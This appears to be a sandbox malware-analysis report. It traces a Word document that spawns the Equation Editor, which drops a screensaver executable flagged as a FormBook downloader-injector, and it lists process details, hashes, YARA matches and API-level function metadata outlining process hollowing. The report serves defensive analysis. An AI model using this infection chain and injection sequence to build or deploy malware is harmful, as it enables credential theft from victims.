a2 28 d9 00 00 06 73 0b 01 00 0a 6f a3 00 00 0a 7a 96 02 Data Ascii: (>sE}@sF}DsG}Bs}As>}E(\-(rU<poz}H6{Ho]6{Ho^:{Ho_((%(soz{K-{Joh(O}K{K*((%(soz

Target ID:	0
Start time:	02:51:18
Start date:	03/06/2024
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Imagebase:	0x13f4c0000
File size:	1'423'704 bytes
MD5 hash:	9EE74859D22DAE61F1750B3A1BACB6F5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	02:51:19
Start date:	03/06/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:51:25
Start date:	03/06/2024
Path:	C:\Users\user\AppData\Roaming\sharon48399.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\sharon48399.scr"
Imagebase:	0xb20000
File size:	825'856 bytes
MD5 hash:	CBFEE83ADF934845EB949B5449FBBF84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000005.00000002.362337538.0000000000A80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:51:25
Start date:	03/06/2024
Path:	C:\Users\user\AppData\Roaming\sharon48399.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\sharon48399.scr"
Imagebase:	0xb20000
File size:	825'856 bytes
MD5 hash:	CBFEE83ADF934845EB949B5449FBBF84
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.405827300.0000000000320000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.405827300.0000000000320000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.406051877.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.406051877.0000000000F00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:51:39
Start date:	03/06/2024
Path:	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe"
Imagebase:	0x300000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.878564779.0000000002860000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.878564779.0000000002860000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	02:51:40
Start date:	03/06/2024
Path:	C:\Windows\SysWOW64\dfrgui.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\dfrgui.exe"
Imagebase:	0x510000
File size:	586'752 bytes
MD5 hash:	FB036244DBD2FADC225AD8650886B641
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.878242341.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.878242341.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.878328572.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.878328572.0000000000330000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.878315434.00000000002F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.878315434.00000000002F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	02:51:45
Start date:	03/06/2024
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Imagebase:	0x400000
File size:	543'304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	02:51:52
Start date:	03/06/2024
Path:	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe"
Imagebase:	0x300000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.878421508.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.878421508.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	14
Start time:	02:52:16
Start date:	03/06/2024
Path:	C:\Program Files (x86)\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Mozilla Firefox\Firefox.exe"
Imagebase:	0x150000
File size:	517'064 bytes
MD5 hash:	C2D924CE9EA2EE3E7B7E6A7C476619CA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.481797908.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.481797908.0000000002B60000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	28.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	27.3%
Total number of Nodes:	44
Total number of Limit Nodes:	1

Executed Functions

Function 001D407F Relevance: 1.9, Strings: 1, Instructions: 623
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(, xrefs: 001D4840

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: b063d8c6208bd1fedcae3cd820a396e6e87b6661790328c096a9e484329608ee
Instruction ID: 2b8a4384a99f286047a74989d815774cd443f2806b7bb297c9da559a2f671765
Opcode Fuzzy Hash: b063d8c6208bd1fedcae3cd820a396e6e87b6661790328c096a9e484329608ee
Instruction Fuzzy Hash: 4152C274D012288FDB68DF65C994BEDBBB2BF89300F1085EAD509A7291DB346E85CF40

Function 001D4BB4 Relevance: 1.7, APIs: 1, Instructions: 224
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4D91

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9e080ecf06f2e273ac80183136b5d1294403282f8ebaa38ee69488340fe417ff
Instruction ID: 96dc5de66602a63b4df1cb39e6e2e05a30beb18814a58c51101ee46227130489
Opcode Fuzzy Hash: 9e080ecf06f2e273ac80183136b5d1294403282f8ebaa38ee69488340fe417ff
Instruction Fuzzy Hash: DE81EE70D00269DFEF24CFA5C844BEDBBB1BB49300F1491AAE508B7260DB349A89DF54

Function 001D4BC0 Relevance: 1.7, APIs: 1, Instructions: 220
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001D4D91

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 9fefe610d8e8d3cb878d119dd307c0731525638c3bc68d61d6d082b54e5f5c4f
Instruction ID: 04cb26cc57896b474bd5259c68f93814d669a48e3ce1bee7a5c17dd05473e9cc
Opcode Fuzzy Hash: 9fefe610d8e8d3cb878d119dd307c0731525638c3bc68d61d6d082b54e5f5c4f
Instruction Fuzzy Hash: 6C81D074D00229DFDF24CFA5C844BEDBBB5BB49300F1091AAE508B7260DB309A89DF54

Function 001D3C60 Relevance: 1.6, APIs: 1, Instructions: 119
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001D3D3B

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 482e38acba5a294bed1efa5c8cd843e84ca553ae7306637235ee81d10f3562e1
Instruction ID: 21fee2ceaae4f48661165717c865358f246c3abc8916148ce8a76307ac78df88
Opcode Fuzzy Hash: 482e38acba5a294bed1efa5c8cd843e84ca553ae7306637235ee81d10f3562e1
Instruction Fuzzy Hash: F64199B5D012489FCF00CFA9D984AEEFBB1AB49310F24942AE814B7250D379AA45CF65

Function 001D3C68 Relevance: 1.6, APIs: 1, Instructions: 116
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001D3D3B

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8b0d5c6dececcdd28e99296d3b1546f34e8c62543b790947870dc8f6ec676821
Instruction ID: 09dadd3b89b56f62988ca6cb6d53c571c362a987fd0c7eec0ae42ff11a2c2088
Opcode Fuzzy Hash: 8b0d5c6dececcdd28e99296d3b1546f34e8c62543b790947870dc8f6ec676821
Instruction Fuzzy Hash: CE4199B5D012589FDF00CFA9D984AEEFBF1BB49310F20942AE818B7250D375AA45CF65

Function 001D3DBC Relevance: 1.6, APIs: 1, Instructions: 102
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001D3E6A

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 55947c9ea32deb57f89a53df0f67d53aae7d2b906f1a7571b3a8dd19af224066
Instruction ID: 6dbc30ddc6c23f9b69f3272cf2f269abf5851e27e4e72200ad2f72c46be12a15
Opcode Fuzzy Hash: 55947c9ea32deb57f89a53df0f67d53aae7d2b906f1a7571b3a8dd19af224066
Instruction Fuzzy Hash: A33198B9D002489FCF10CFA9D984AEEFBB1AB49310F20942AE815B7350D775AA05CF65

Function 001D4FE9 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001D509D

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 74e31f545cdb067a47edb0a1ea86077d93a730f01d2666294f9163ba04038be0
Instruction ID: e9aff9026fe4ab6781f64e0204f2c2e4ae8a4713a014b26b1557242b0d3eda04
Opcode Fuzzy Hash: 74e31f545cdb067a47edb0a1ea86077d93a730f01d2666294f9163ba04038be0
Instruction Fuzzy Hash: 2A4177B9D04258DFCF10CFA9D884ADEFBB1BB59310F24906AE815B7210C375AA45CF65

Function 001D3DC0 Relevance: 1.6, APIs: 1, Instructions: 101
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001D3E6A

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 13112148cf67514b1fbcb1648e2d9175173b4fd6c4a3f16f1be47ca3f3495fbe
Instruction ID: ea0e79ff18929353da10e54587a4785925db7455fd5830a95cfb7422d8f18ea5
Opcode Fuzzy Hash: 13112148cf67514b1fbcb1648e2d9175173b4fd6c4a3f16f1be47ca3f3495fbe
Instruction Fuzzy Hash: B23198B8D002489FCF10CFA9D984ADEFBB1AB49310F20942AE814B7350D735AA05CF65

Function 001D4FF0 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001D509D

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: dd143c5bc9d57f5892ec28960b0bfdb277a854db0190f83b99399a49ebce8078
Instruction ID: 52e7f68273e57c2da4afb79cd8aafbc0e010bf41697891f79fe9f26421fb30ec
Opcode Fuzzy Hash: dd143c5bc9d57f5892ec28960b0bfdb277a854db0190f83b99399a49ebce8078
Instruction Fuzzy Hash: FE3168B9D042589FCF10CFAAD984ADEFBB1BB19310F24902AE814B7310D375AA45CF65

Function 001D3730 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001D37E7

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 193c9d434b3ef9185d720dee3ad868954ecc1315f6f4386f2442aed9c3abc562
Instruction ID: a90f0421eefb1da059a4f71f28aa54ad55472b72b92797952fcfd98991f44cb7
Opcode Fuzzy Hash: 193c9d434b3ef9185d720dee3ad868954ecc1315f6f4386f2442aed9c3abc562
Instruction Fuzzy Hash: 4841BFB5D002599FDB10CFA9D8846EEFBF1BF89310F24842AE414B7240C779AA45CF55

Function 001D3738 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,?), ref: 001D37E7

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 08e59389e3ac264217e144a7b4fd9ac950693958571dbb27862f74bc794c3442
Instruction ID: 7734dccfcc912748f1b4d0f3f67420cc62b165f5362dc4649e2edc1a9166dcb6
Opcode Fuzzy Hash: 08e59389e3ac264217e144a7b4fd9ac950693958571dbb27862f74bc794c3442
Instruction Fuzzy Hash: A831ACB5D012589FDB10CFA9D984AEEFBF1BF49310F24802AE418B7250D778AA49CF55

Function 001D3EDA Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 001D3F5E

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 723bc3ed015c527a37186dc246df7e622bfac931015eadbc8c0cae4ef705c104
Instruction ID: 8c2323b23ed4ee1caae4dd97cefd437f39001a0bb0d677fa5e97fad67241b29c
Opcode Fuzzy Hash: 723bc3ed015c527a37186dc246df7e622bfac931015eadbc8c0cae4ef705c104
Instruction Fuzzy Hash: 0F31CBB4D012089FCF14CFA9D984AEEFBB1AF89310F20942AE814B7310C774AA45CF55

Function 001D3EE0 Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 001D3F5E

Memory Dump Source

Source File: 00000005.00000002.362058433.00000000001D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1d0000_sharon48399.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 3098ea67161eb422dfd3c9a6ed827bff3211d2a58d28fa939c4d9a26c76ddc2b
Instruction ID: 559ab1f854de0561f9687abe65de663777242456eb238ed8e6dbe36f36b5d0dc
Opcode Fuzzy Hash: 3098ea67161eb422dfd3c9a6ed827bff3211d2a58d28fa939c4d9a26c76ddc2b
Instruction Fuzzy Hash: 9431ABB4D012189FDF14CFA9D984AEEFBB5AF89310F20942AE814B7310C775AA05CF55

Function 000FD5B8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362007687.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fd000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 17a7f91949763e26aa9ab28a4e6d758dc342c490cc86b5d6ab4ec307266b6d8e
Instruction ID: 0e6015460b6b8032a63a4cea81ecfa033f79598a6932fd3ac17ebe363388f556
Opcode Fuzzy Hash: 17a7f91949763e26aa9ab28a4e6d758dc342c490cc86b5d6ab4ec307266b6d8e
Instruction Fuzzy Hash: 59216A71104204DFDF14CF10D9C0B2ABFA6FBD4314F30856AE9094B606C336D856EBA1

Function 0010D1E8 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362013837.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10d000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaaa9eb1c9e5cfc438900d78adf3d2c3d2263869addccc51ef2535cfb7d9073c
Instruction ID: 9f3424dd81abd2c0b2fcb305b5a04e6647ca8b48e1d9f9047da9b68910563293
Opcode Fuzzy Hash: aaaa9eb1c9e5cfc438900d78adf3d2c3d2263869addccc51ef2535cfb7d9073c
Instruction Fuzzy Hash: 2B21F275604240EFDB04CF90E9C4B26FB65EB98714F24C569E8894B286C3B6D846CBA1

Function 0010D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362013837.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10d000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68ee54713655fc2c6ef70be00c39b14f20ecbcef3ac1b3b76a4ea0a72d5ef0a4
Instruction ID: 2fa568087e963818194ac33302847e4d5ef523608046380b4dcb771aab606cc7
Opcode Fuzzy Hash: 68ee54713655fc2c6ef70be00c39b14f20ecbcef3ac1b3b76a4ea0a72d5ef0a4
Instruction Fuzzy Hash: A6210475604240EFEB14CF54E8C4B16BB65EB88314F30C569E88D4B28AC3BAD847CBA1

Function 000FD5B3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362007687.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_fd000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 085e9a923e8aedba8eff152319287174092cc1e6cad3e562e97f6467fdc287f8
Instruction ID: c1cfb54569f6c39648d5413ab285ae5b1bd199b1e39cccfef88e042b4a50a428
Opcode Fuzzy Hash: 085e9a923e8aedba8eff152319287174092cc1e6cad3e562e97f6467fdc287f8
Instruction Fuzzy Hash: 5211D376504284CFDF11CF10D9C4B26BFB2FB94314F24C6AAD9094B616C336D85ADBA2

Function 0010D1E3 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362013837.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10d000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
Instruction ID: e8192dd76ae7902e8410362de71773225825d9e8be87f9f4a8f080ae3946d8ca
Opcode Fuzzy Hash: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
Instruction Fuzzy Hash: B4118B75504280DFDB02CF50E5C4B15FFB1EB84314F28C6AAD8494B696C37AD85ACFA1

Function 0010D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.362013837.000000000010D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0010D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10d000_sharon48399.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
Instruction ID: cba125922fa4aab1465961fea03b2dae8f350900a79648b570a2c7a800c39e1d
Opcode Fuzzy Hash: 9166c7a4dd2eec6ce831343740cf9da501b323eca94e9702a4ab88c0cd9770f2
Instruction Fuzzy Hash: 6E118B75504280DFDB11CF54E9C4B15BBB1EB84314F24C6AAE8494B69AC37AD84ACFA2

Analysis Process: sharon48399.scrPID: 2176, Parent PID: 1964COMMON

Execution Graph

Execution Coverage:	1.6%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	14.2%
Total number of Nodes:	253
Total number of Limit Nodes:	26

Executed Functions

Function 0040B2E3 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 186
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtMapViewOfSection.NTDLL(?,00000000,00000000,00000000,?,?,00000000,?,4q@,?,?,?,00000000), ref: 0040B44D

Strings

4q@, xrefs: 0040B429, 0040B42C
4q@, xrefs: 0040B4FC

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: SectionView
String ID: 4q@$4q@
API String ID: 1323581903-352822288
Opcode ID: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
Instruction ID: 4f0a1b00017ecff07558768542bc8224e4be8ae8b3833d489124d6a477246c7f
Opcode Fuzzy Hash: c8cf07480daa701a2a6a95d8220c56878a179f3d73bf5b45c1068934c0e84736
Instruction Fuzzy Hash: 16711C71E04158DFCB04CFA9C990AEDBBF5AF49304F18816AE859B7341D738AA45CF98

Function 0040B513 Relevance: 1.7, APIs: 1, Instructions: 188
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(?,?,?,?,?,?,00000000,?,?,?,?), ref: 0040B681

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
Instruction ID: 33bbf8d930d8e7cfe3f019b155e8ea3f1efd11963211b11a84fa3dbb01a3117a
Opcode Fuzzy Hash: d675ffe184b4cf3df129620c1f37ed63615b89ad24ad60a713524158cd36fee6
Instruction Fuzzy Hash: 1C813D71E041589FCB04CFA9C990AEDBBF5AF49304F18816AE459B7341D738A941CF99

Function 0040B743 Relevance: 1.7, APIs: 1, Instructions: 184
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(?,?,?,?,?,?,00000000,?,?), ref: 0040B8A9

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
Instruction ID: d5ca7a445566d5324237c67d8bda7c3d62ebcdba52f65f536e33ce5b52a41de4
Opcode Fuzzy Hash: 7406610fe4a71597561f2b8bae0021fa1a59eb1c802fb029ede16d8a052d8adc
Instruction Fuzzy Hash: 6B713BB1E14158DBCB04CFA9C890AEDBBF5BF49304F18816AE859B7351D338A945CF98

Function 0040B0C3 Relevance: 1.7, APIs: 1, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateSection.NTDLL(?,00000000,000F001F,?,?,004070F1,00000000,?,?,08000000), ref: 0040B221

Memory Dump Source

Source File: 00000006.00000002.405842780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_sharon48399.jbxd

Yara matches

Similarity

API ID: CreateSection
String ID:
API String ID: 2449625523-0
Opcode ID: adff89788c227dfb02b330619a6bccec0f9c373fd36e43cb928eaab211708a8b
Instruction ID: 01317c8874684397ccd25c89dd95e7ea8e4a3edbd884f59941ddaf063ff58e3a
